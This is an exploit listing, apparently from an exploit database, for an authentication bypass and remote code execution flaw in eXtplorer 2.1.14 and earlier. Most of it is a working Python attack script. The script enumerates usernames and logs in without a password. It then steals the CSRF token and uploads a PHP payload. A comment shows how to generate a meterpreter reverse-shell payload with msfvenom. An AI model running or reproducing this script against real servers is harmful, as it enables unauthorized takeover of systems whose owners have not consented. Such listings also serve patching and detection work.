Exploit for eXtplorer 2.1.14 Authentication Bypass / Remote Code Execution

Name: Exploit for eXtplorer 2.1.14 Authentication Bypass / Remote Code Execution
Rating: 5 (133 reviews)
2023-03-27 | CVSS 6.8
## https://sploitus.com/exploit?id=PACKETSTORM:171493
# Exploit Title: eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE)  
# Exploit Author: ErPaciocco  
# Author Website: https://erpaciocco.github.io  
# Vendor Homepage: https://extplorer.net/  
#  
# Vendor:  
# ==============  
# extplorer.net  
#  
# Product:  
# ==================  
# eXtplorer <= v2.1.14  
#  
# eXtplorer is a PHP and Javascript-based File Manager, it allows to browse  
# directories, edit, copy, move, delete,  
# search, upload and download files, create & extract archives, create new  
# files and directories, change file  
# permissions (chmod) and more. It is often used as FTP extension for popular  
# applications like Joomla.  
#  
# Vulnerability Type:  
# ======================  
# Authentication Bypass (& Remote Command Execution)  
#  
#  
# Vulnerability Details:  
# =====================  
#  
# eXtplorer authentication mechanism allows an attacker  
# to login into the Admin Panel without knowing the password  
# of the victim, but only its username. This vector is exploited  
# by not supplying password in POST request.  
#  
#  
# Tested on Windows  
#   
#  
# Reproduction steps:  
# ==================  
#  
# 1) Navigate to Login Panel  
# 2) Intercept authentication POST request to /index.php  
# 3) Remove 'password' field  
# 4) Send it and enjoy!  
#  
#  
# Exploit code(s):  
# ===============  
#  
# Run below PY script from CLI...  
#  
# [eXtplorer_auth_bypass.py]  
#  
  
# Proof Of Concept  
  
try:  
import requests  
except:  
print(f"ERROR: RUN: pip install requests")  
exit()  
import sys  
import time  
import urllib.parse  
import re  
import random  
import string  
import socket  
import time  
import base64  
  
TARGET = None  
WORDLIST = None  
  
_BUILTIN_WL = [  
'root',  
'admin',  
'test',  
'guest',  
'info',  
'adm',  
'user',  
'administrator'  
]  
  
_HOST = None  
_PATH = None  
_SESSION = None  
_HEADERS = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0',  
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',  
'Accept-Language': 'it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3',  
'Accept-Encoding': 'gzip, deflate, br',  
'Connection': 'keep-alive' }  
  
def detect():  
global _HOST  
global _PATH  
global _SESSION  
global _HEADERS  
  
_HOST = TARGET[0].split(':')[0] + '://' + TARGET[0].split('/')[2]  
_PATH = '/'.join(TARGET[0].split('/')[3:]).rstrip('/')  
  
  
  
_SESSION = requests.Session()  
  
raw = _SESSION.get(f"{_HOST}/{_PATH}/extplorer.xml", headers=_HEADERS, verify=False)  
  
if raw.status_code == 200:  
ver = re.findall("<version>(((\d+)\.?)+)<\/version>", raw.text, re.MULTILINE)  
  
if int(ver[0][2]) < 15:  
return True  
  
return False  
  
  
def auth_bypass():  
global _HOST  
global _PATH  
global _SESSION  
global _HEADERS  
  
global WORDLIST  
global _BUILTIN_WL  
  
_HEADERS['X-Requested-With'] = 'XMLHttpRequest'  
  
params = {'option': 'com_extplorer',  
'action': 'login',  
'type': 'extplorer',  
'username': 'admin',  
'lang':'english'}  
  
if WORDLIST != None:  
if WORDLIST == _BUILTIN_WL:  
info(f"Attempting to guess an username from builtin wordlist")  
wl = _BUILTIN_WL  
else:  
info(f"Attempting to guess an username from wordlist: {WORDLIST[0]}")  
with open(WORDLIST[0], "r") as f:  
wl = f.read().split('\n')  
for user in wl:  
params = {'option': 'com_extplorer',  
'action': 'login',  
'type': 'extplorer',  
'username': user,  
'lang':'english'}  
  
info(f"Trying with {user}")  
  
res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False)  
if "successful" in res.text:  
return (user)  
else:  
res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False)  
  
if "successful" in res.text:  
return ('admin')  
  
return False  
  
def rce():  
global _HOST  
global _PATH  
global _SESSION  
global _HEADERS  
global _PAYLOAD  
  
tokenReq = _SESSION.get(f"{_HOST}/{_PATH}/index.php?option=com_extplorer&action=include_javascript&file=functions.js")  
token = re.findall("token:\s\"([a-f0-9]{32})\"", tokenReq.text)[0]  
  
info(f"CSRF Token obtained: {token}")  
  
payload = editPayload()  
  
info(f"Payload edited to fit local parameters")  
  
  
params = {'option': 'com_extplorer',  
'action': 'upload',  
'dir': f"./{_PATH}",  
'requestType': 'xmlhttprequest',  
'confirm':'true',  
'token': token}  
name = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6))  
files = {'userfile[0]':(f"{name}.php", payload)}  
  
req = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, files=files, verify=False)  
  
if "successful" in req.text:  
info(f"File {name}.php uploaded in root dir")  
info(f"Now set a (metasploit) listener and go to: {_HOST}/{_PATH}/{name}.php")  
  
def attack():  
if not TARGET:  
error("TARGET needed")  
  
if TARGET:  
if not detect():  
error("eXtplorer vulnerable instance not found!")  
exit(1)  
else:  
info("eXtplorer endpoint is vulnerable!")  
username = auth_bypass()  
if username:  
info("Auth bypassed!")  
rce()  
else:  
error("Username 'admin' not found")  
  
def error(message):  
print(f"[E] {message}")  
  
def info(message):  
print(f"[I] {message}")  
  
def editPayload():  
# You can generate payload with msfvenom and paste below base64 encoded result  
# msfvenom -p php/meterpreter_reverse_tcp LHOST=<yourIP> LPORT=<yourPORT> -f base64  
return base64.b64decode("PD9waHAgZWNobyAiSEFDS0VEISI7ICA/Pg==")  
  
def help():  
print(r"""eXtplorer <= 2.1.14 exploit - Authentication Bypass & Remote Code Execution  
  
Usage:  
python3 eXtplorer_auth_bypass.py -t <target-host> [-w <userlist>] [-wb]  
  
Options:  
-t Target host. Provide target IP address (and optionally port).  
-w Wordlist for user enumeration and authentication (Optional)  
-wb Use built-in wordlist for user enumeration (Optional)  
-h Show this help menu.  
""")  
return True  
  
args = {"t" : (1, lambda *x: (globals().update(TARGET = x[0]))),  
"w" : (1, lambda *x: (globals().update(WORDLIST = x[0]))),  
"wb": (0, lambda *x: (globals().update(WORDLIST = _BUILTIN_WL))),  
"h" : (0, lambda *x: (help() and exit(0)))}  
  
if __name__ == "__main__":  
i = 1  
[  
args[ arg[1:]][1](sys.argv[i+1: (i:=i+1+args[arg[1:]][0]) ])  
for arg in [k  
for k in sys.argv[i:]  
]  
if arg[0] == '-'  
]  
attack()  
else:  
help()  
  
  
# ///////////////////////////////////////////////////////////////////////  
  
# [Script examples]  
#  
#  
# c:\>python eXtplorer_auth_bypass.py -t https://target.com  
# c:\>python eXtplorer_auth_bypass.py -t http://target.com:1234 -w wordlist.txt  
# c:\>python eXtplorer_auth_bypass.py -t http://target.com -wb  
  
# Exploitation Method:  
# ======================  
# Remote  
  
# [+] Disclaimer  
# The information contained within this advisory is supplied "as-is" with no  
# warranties or guarantees of fitness of use or otherwise.  
# Permission is hereby granted for the redistribution of this advisory,  
# provided that it is not altered except by reformatting it, and  
# that due credit is given. Permission is explicitly given for insertion in  
# vulnerability databases and similar, provided that due credit  
# is given to the author. The author is not responsible for any misuse of the  
# information contained herein and accepts no responsibility  
# for any damage caused by the use or misuse of this information.